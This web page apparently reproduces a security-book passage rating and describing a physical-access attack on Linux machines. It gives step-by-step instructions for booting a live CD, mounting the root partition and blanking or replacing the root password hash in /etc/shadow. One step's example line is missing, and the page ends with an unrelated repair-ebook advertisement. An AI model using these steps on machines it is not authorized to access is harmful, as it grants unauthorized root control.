Stealing Changing Data Using a Bootable Linux CD

Popularity:

7

Simplicity:

9

Impact:

10

Risk Rating:

9

Once an attacker has gained physical access, getting into a box can be as simple as booting to a CD-based Linux distribution, deleting the root user account password in the /etc/shadow file (or replacing it with a known password and salt), and booting into the system, normally with full access. This can be accomplished step-by-step as follows:

1. Reboot the system and configure it to boot from the CD-ROM.

2. Boot the system into the bootable Linux distribution, such as one of the following:

• Backtrack2 (http://www.remote-exploit.org/backtrack_download.html)

• Knoppix-STD (http://s-t-d.org/download.html)

3. Open a root command shell.

4. Create a mount point by typing the following mkdir mountpoint, which will create a directory called mountpoint. This is where the file system will be mounted.

5. Determine the type of hard disks (SCSI or IDE) on the system. SCSI drives will be represented by sda, sdb, sdc, and so on, whereas IDE drives are represented by hda, hdb, hdc, and so on. To determine the disk type, type fdisk -l or look through the output of the dmesg command. Sometimes you'll need to try several approaches.

6. Determine the partition on the disk to be mounted. Partitions on the disk are represented as sdal, sda2, sda2, and so on, for SCSI drives and hdal, hda2, hda3, and so on, for IDE drives. Identifying the correct partition that contains the /etc/shadow file (always the root "/" partition) can be trial and error, especially if numerous partitions exist on the system, but it is usually one of the first three partitions.

7. Type mount /dev/sda# mountpoint, where /dev/sda# is your root partition (sdal, sda2, sda3,...), and mountpoint is the directory you created.

8. Change to the /etc directory on your root partition by typing cd mountpoint/ etc.

9. Use your favorite text editor (such as vi) to open the etc/shadow file for editing.

10. Scroll down to the line containing the root's information, which looks something like:

root:qDlrwz/E8RSKw:13659:0:99999:7:::

11. Delete everything between the first and second colons, so the line resembles this one:

If password complexity is enabled on the system, deleting the root password will not allow you to successfully log in to the system using a null password. A known password meeting complexity requirements using the same encryption methodology must be copied and pasted in place of the old root password.

12. Save the file and exit your editor.

13. Type cd to return to the home directory.

14. Type umount mountpoint to unmount the target file system.

15. Type reboot to reboot the system and remove the bootable Linux distribution CD from the drive.

16. Now the system can be accessed as root with no password (or the known password).

Was this article helpful?

0 0
The Ultimate Computer Repair Guide

The Ultimate Computer Repair Guide

Read how to maintain and repair any desktop and laptop computer. This Ebook has articles with photos and videos that show detailed step by step pc repair and maintenance procedures. There are many links to online videos that explain how you can build, maintain, speed up, clean, and repair your computer yourself. Put the money that you were going to pay the PC Tech in your own pocket.

Get My Free Ebook


Post a comment